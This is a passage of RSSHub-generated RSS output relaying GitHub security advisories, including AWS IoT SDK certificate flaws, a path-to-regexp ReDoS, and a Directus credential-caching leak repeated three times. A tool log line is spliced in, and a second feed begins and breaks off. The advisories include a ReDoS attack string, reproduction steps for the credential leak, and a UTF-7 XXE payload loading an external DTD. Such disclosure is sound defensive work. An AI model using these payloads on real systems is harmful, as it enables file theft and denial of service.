<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-861.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-94jq-q5v2-76wj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-94jq-q5v2-76wj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user-supplied Certificate Authority (CA) to the root CAs instead of overriding it on Unix systems. TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system's default trust store. Attackers who have access to a host's trust stores, or who are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case), may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to override the default trust store. This corrects this issue. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on Linux/Unix. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on Linux/Unix. Amazon Web Services AWS-C-IO 0.10.4 on Linux/Unix.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40830">https://nvd.nist.gov/vuln/detail/CVE-2021-40830</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/67950ad2a02f2f9355c310b69dc9226b017f32f2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/53a36e3ac203291494120604d416b6de59177cac</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/0450ce68add7e3d05c6d781ecdac953c299c053a</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-c4rh-4376-gff4">https://github.com/advisories/GHSA-c4rh-4376-gff4</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-863.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-c4rh-4376-gff4</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-c4rh-4376-gff4</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>The AWS IoT Device SDK v2 for Java, Python, C++ and Node.js appends a user-supplied Certificate Authority (CA) to the root CAs instead of overriding it on macOS systems. Additionally, SNI validation is not enabled when the CA has been "overridden". TLS handshakes will thus succeed if the peer can be verified either from the user-supplied CA or the system's default trust store. Attackers who have access to a host's trust stores, or who are able to compromise a certificate authority already in the host's trust store (note: the attacker must also be able to spoof DNS in this case), may be able to use this issue to bypass CA pinning. An attacker could then spoof the MQTT broker, and either drop traffic and/or respond with the attacker's data, but they would not be able to forward this data on to the MQTT broker because the attacker would still need the user's private keys to authenticate against the MQTT broker. The <code>aws_tls_ctx_options_override_default_trust_store_*</code> function within the aws-c-io submodule has been updated to address this behavior. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.5.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.7.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.14.0 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.6.0 on macOS. Amazon Web Services AWS-C-IO 0.10.7 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40831">https://nvd.nist.gov/vuln/detail/CVE-2021-40831</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186">https://github.com/aws/aws-iot-device-sdk-java-v2/commit/46375e9b1bfb34109b9ff3b1eff9c770f9daa186</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68">https://github.com/aws/aws-iot-device-sdk-js-v2/commit/22f1989f5bdb0bdd9c912a5a2d255ee6c0854f68</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d">https://github.com/aws/aws-iot-device-sdk-python-v2/commit/5aef82573202309063eb540b72cee0e565f85a2d</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-j3f7-7rmc-6wqj">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-864.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-j3f7-7rmc-6wqj</guid>
<author>GitHub</author>
</item>
<item>
<title>[aws-iot-device-sdk-v2] Improper certificate management in AWS IoT Device SDK v2</title>
<description><p>Connections initialized by the AWS IoT Device SDK v2 for Java (versions prior to 1.4.2), Python (versions prior to 1.6.1), C++ (versions prior to 1.12.7) and Node.js (versions prior to 1.5.3) did not verify the server certificate hostname during the TLS handshake when overriding Certificate Authorities (CA) in their trust stores on macOS. This issue has been addressed in aws-c-io submodule versions 0.10.5 onward. This issue affects: Amazon Web Services AWS IoT Device SDK v2 for Java versions prior to 1.4.2 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Python versions prior to 1.6.1 on macOS. Amazon Web Services AWS IoT Device SDK v2 for C++ versions prior to 1.12.7 on macOS. Amazon Web Services AWS IoT Device SDK v2 for Node.js versions prior to 1.5.3 on macOS. Amazon Web Services AWS-C-IO 0.10.4 on macOS.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-40829">https://nvd.nist.gov/vuln/detail/CVE-2021-40829</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2">https://github.com/aws/aws-iot-device-sdk-java-v2/commits/v1.4.2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-cpp-v2">https://github.com/aws/aws-iot-device-sdk-cpp-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-java-v2">https://github.com/aws/aws-iot-device-sdk-java-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-js-v2">https://github.com/aws/aws-iot-device-sdk-js-v2</a></li>
<li><a href="https://github.com/aws/aws-iot-device-sdk-python-v2">https://github.com/aws/aws-iot-device-sdk-python-v2</a></li>
<li><a href="https://github.com/advisories/GHSA-743r-5g92-5vgf">https://github.com/advisories/GHSA-743r-5g92-5vgf</a></li>
<li><a href="https://github.com/awslabs/aws-c-io">https://github.com/awslabs/aws-c-io</a></li>
<li><a href="https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml">https://github.com/pypa/advisory-database/tree/main/vulns/awsiotsdk/PYSEC-2021-862.yaml</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-743r-5g92-5vgf</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-743r-5g92-5vgf</guid>
<author>GitHub</author>
</item>
<item>
<title>[path-to-regexp] path-to-regexp outputs backtracking regular expressions</title>
<description><h3 id="impact">Impact</h3>
<p>A bad regular expression is generated any time you have two parameters within a single segment, separated by something that is not a period (<code>.</code>). For example, <code>/:a-:b</code>.</p>
<h3 id="patches">Patches</h3>
<p>For users of 0.1, upgrade to <code>0.1.10</code>. All other users should upgrade to <code>8.0.0</code>.</p>
<p>These versions add backtrack protection when a custom regex pattern is not provided:</p>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v0.1.10">0.1.10</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v1.9.0">1.9.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v3.3.0">3.3.0</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">6.3.0</a></li>
</ul>
<p>They do not protect against vulnerable user-supplied capture groups. Protecting against explicit user patterns is out of scope for old versions and not considered a vulnerability.</p>
<p>In version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v7.1.0">7.1.0</a> you can enable <code>strict: true</code> to get an error when the regular expression might be bad.</p>
<p>Version <a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v8.0.0">8.0.0</a> removes the features that can cause a ReDoS.</p>
<h3 id="workarounds">Workarounds</h3>
<p>All versions can be patched by providing a custom regular expression for parameters after the first in a single segment. As long as the custom regular expression does not match the text before the parameter, you will be safe. For example, change <code>/:a-:b</code> to <code>/:a-:b([^-/]+)</code>.</p>
<p>If paths cannot be rewritten and versions cannot be upgraded, another alternative is to limit the URL length. For example, halving the attack string makes matching roughly 4x faster.</p>
<h3 id="details">Details</h3>
<p>Using <code>/:a-:b</code> will produce the regular expression <code>/^\/([^\/]+?)-([^\/]+?)\/?$/</code>. This can be exploited by a path such as <code>/a${'-a'.repeat(8_000)}/a</code>. <a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a> has a good example of why this occurs, but the TL;DR is the <code>/a</code> at the end ensures this route would never match but due to naive backtracking it will still attempt every combination of the <code>:a-:b</code> on the repeated 8,000 <code>-a</code>.</p>
<p>Because JavaScript is single threaded and regex matching runs on the main thread, poor performance will block the event loop and can lead to a DoS. In local benchmarks, exploiting the unsafe regex will result in performance that is over 1000x worse than the safe regex. In a more realistic environment using Express v4 and 10 concurrent connections, this translated to average latency of ~600ms vs 1ms.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS">OWASP</a></li>
<li><a href="https://blakeembrey.com/posts/2024-09-web-redos/">Detailed blog post</a></li>
</ul>
<h3 id="references-1">References</h3>
<ul>
<li><a href="https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j">https://github.com/pillarjs/path-to-regexp/security/advisories/GHSA-9wv6-86v2-598j</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f">https://github.com/pillarjs/path-to-regexp/commit/29b96b4a1de52824e1ca0f49a701183cc4ed476f</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6">https://github.com/pillarjs/path-to-regexp/commit/60f2121e9b66b7b622cc01080df0aabda9eedee6</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45296">https://nvd.nist.gov/vuln/detail/CVE-2024-45296</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485">https://github.com/pillarjs/path-to-regexp/commit/925ac8e3c5780b02f58cbd4e52f95da8ad2ac485</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef">https://github.com/pillarjs/path-to-regexp/commit/d31670ae8f6e69cbfd56e835742195b7d10942ef</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894">https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894</a></li>
<li><a href="https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0">https://github.com/pillarjs/path-to-regexp/releases/tag/v6.3.0</a></li>
<li><a href="https://github.com/advisories/GHSA-9wv6-86v2-598j">https://github.com/advisories/GHSA-9wv6-86v2-598j</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-9wv6-86v2-598j</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[dset] dset Prototype Pollution vulnerability</title>
<description><p>Versions of the package dset before 3.1.4 are vulnerable to Prototype Pollution via the dset function due to improper user input sanitization. This vulnerability allows the attacker to inject a malicious object property using the built-in Object property <code>__proto__</code>, which is recursively assigned to all the objects in the program.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-21529">https://nvd.nist.gov/vuln/detail/CVE-2024-21529</a></li>
<li><a href="https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa">https://github.com/lukeed/dset/commit/16d6154e085bef01e99f01330e5a421a7f098afa</a></li>
<li><a href="https://security.snyk.io/vuln/SNYK-JS-DSET-7116691">https://security.snyk.io/vuln/SNYK-JS-DSET-7116691</a></li>
<li><a href="https://github.com/advisories/GHSA-f6v4-cf5j-vf3w">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f6v4-cf5j-vf3w</guid>
<author>GitHub</author>
</item>
<item>
<title>[lunary] lunary-ai/lunary Access Control Vulnerability in Prompt Variation Management</title>
<description><p>In lunary-ai/lunary version 1.2.13, an insufficient granularity of access control vulnerability allows users to create, update, get, and delete prompt variations for datasets not owned by their organization. This issue arises due to the application not properly validating the ownership of dataset prompts and their variations against the organization or project of the requesting user. As a result, unauthorized modifications to dataset prompts can occur, leading to altered or removed dataset prompts without proper authorization. This vulnerability impacts the integrity and consistency of dataset information, potentially affecting the results of experiments.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-5389">https://nvd.nist.gov/vuln/detail/CVE-2024-5389</a></li>
<li><a href="https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2">https://huntr.com/bounties/3ca5309f-5615-4d5b-8043-968af220d7a2</a></li>
<li><a href="https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e">https://github.com/lunary-ai/lunary/commit/35dd4af0001a54ccb14276a1546eb977f82c0c5e</a></li>
<li><a href="https://github.com/advisories/GHSA-3mwc-2cj7-gx8c">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-3mwc-2cj7-gx8c</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>An unauthenticated user can access the credentials of the last authenticated user via OpenID or OAuth2 when the authentication URL did not include the <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via the SSO link, it will return the credentials of the last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus.</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint, for both OpenID and OAuth2, Directus uses the <code>respond</code> middleware, which by default tries to cache GET requests that meet some conditions. However, those conditions do not account for this scenario, in which an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2, here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, because the cache differs between nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the main URL of your project. For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that you got redirected to a page with a JSON including an <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window, go to the SSO link <code>http://localhost:8055/auth/login/openid/callback</code> and see that you get the same credentials, even though you have no session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth2 that do not include the <code>redirect</code> query string when logging in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus.</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint, for both OpenID and OAuth2, Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that meet some conditions. However, those conditions do not include this scenario, where an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 it can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the main URL of your project. For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2 that do not include the <code>redirect</code> query string when logging in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[directus] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus.</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint, for both OpenID and OAuth2, Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that meet some conditions. However, those conditions do not include this scenario, where an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 it can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the main URL of your project. For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2 that do not include the <code>redirect</code> query string when logging in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8 ... |
Successfully generated as follows: http://localhost:1200/github-advisor/data - Success ✔️
<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:36 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows an XXE attack, which in turn allows an attacker to obtain the contents of local files, even if error reporting is muted by the @ symbol (LFI attack).</p>
<h3 id="details">Details</h3>
<p>The check <code>$pattern = '/encoding="(.*?)"/';</code> is easy to bypass: just use a single quote symbol <code>'</code>. So the payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
